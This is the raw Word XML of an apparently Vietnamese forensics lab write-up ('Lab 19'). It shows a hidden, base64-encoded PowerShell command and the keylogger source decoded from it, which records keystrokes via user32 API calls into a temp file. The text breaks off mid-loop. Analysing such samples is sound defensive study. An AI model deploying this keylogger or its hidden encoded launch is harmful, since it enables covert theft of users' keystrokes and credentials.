    <w:p w14:paraId="217AC255" w14:textId="4123602E" w:rsidR="00AC7285" w:rsidRDefault="00AC7285">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab 19:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A37BFB2" w14:textId="22C6AFCC" w:rsidR="00F853D8" w:rsidRDefault="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Ta thấy được có một tiến trình power shell chạy đoạn mã như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756E1719" w14:textId="623A1E94" w:rsidR="00211894" w:rsidRDefault="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -windowstyle hidden -EncodedCommand IwByAGUAcQB1AGkAcgBlAHMAIAAtAFYAZQByAHMAaQBvAG4AIAAyAAoAZgB1AG4AYwB0AGkAbwBuACAAUwB0AGEAcgB0AC0ASwBlAHkATABvAGcAZwBlAHIAKAAkAFAAYQB0AGgAPQAiACQAZQBuAHYAOgB0AGUAbQBwAFwAbABvAGcAZgBpAGwAZQAuAHQAeAB0ACIAKQAgAAoAewAKACAAIAAj</w:t>
      </w:r>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306998DD" w14:textId="002D7501" w:rsidR="00211894" w:rsidRDefault="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Giải mã đoạn mã và xóa bớt kí tự thừa ta được đoạn code như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B78BA1A" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>requires -Version 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31883AF5" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524A95BB" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>function Start-KeyLogger($Path="$env:temp\logfile.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F00C7" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AD7D9A" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Signatures for API Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B85655" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    $signatures = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D4EF77" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F39A58" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7075144F" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>public static extern short GetAsyncKeyState(int virtualKeyCode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5698FB95" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F857B9" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>[DllImport("user32.dll", CharSet=CharSet.Auto)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634A30D1" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>public static extern int GetKeyboardState(byte[] keystate);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303FAF3F" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1632DE41" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>[DllImport("user32.dll", CharSet=CharSet.Auto)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38851956" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>public static extern int MapVirtualKey(uint uCode, int uMapType);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529DB25" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C911A8" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>[DllImport("user32.dll", CharSet=CharSet.Auto)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B70D21" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>public static extern ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, StringBuilder pwzBuffer, int cchBuff, uint wFlags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FA68C" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7225107D" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F67E21" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15516F10" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # load signatures and make members available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E7FB1" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    $API = Add-Type -Type MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D15A30F" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="221D56BC" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # create output file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A952D6E" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    $null = New-Item -Path $Path -ItemType File -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FCCB93" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281A8E7C" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD8FAD9" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C1B78" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        # Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59568CC1" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6862B0DC" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # create endless loop. When user presses CTRL+C, finally-block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D27E594" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # executes and shows the collected key presses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9F29B1" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        while ($true) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F5DB7" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478B1D68" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            Start-Sleep -Milliseconds 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF3F639" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039C193" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            # scan all ASCII codes above 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3E837" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            for ($ascii = 9; $ascii -le 254; $ascii++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B04838" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF55B3" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                if ($API::GetAsyncKeyState($ascii))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E178733" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AA7AD6" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    # get current key state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323705E9" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    $state = $API::GetKeyboardState([byte[]]@(0)*256)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EA8EE5" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    $checkkstate = $API::GetKeyboardState($kstate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58789319" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B010DB" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    # prepare a StringBuilder to receive input key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1183752F" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    $mychar = New-Object -TypeName System.Text.StringBuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B333475" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76706908" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    # translate virtual key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A53E9" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    $success = $API::ToUnicode($ascii, $API::MapVirtualKey($ascii, 0), $kstate, $mychar, $mychar.Capacity, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF20329" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B701CDA" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    # translate virtual key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270FB2AF" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    $mychar = New-Object -TypeName System.Text.StringBuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046B519" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E4B89" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    # Success writing to log file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC49D3C" w14:textId="77777777" w:rsidR="00211894" w:rsidRPr="00211894" w:rsidRDefault="00211894" w:rsidP="00211894">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211894">
        <w:rPr>
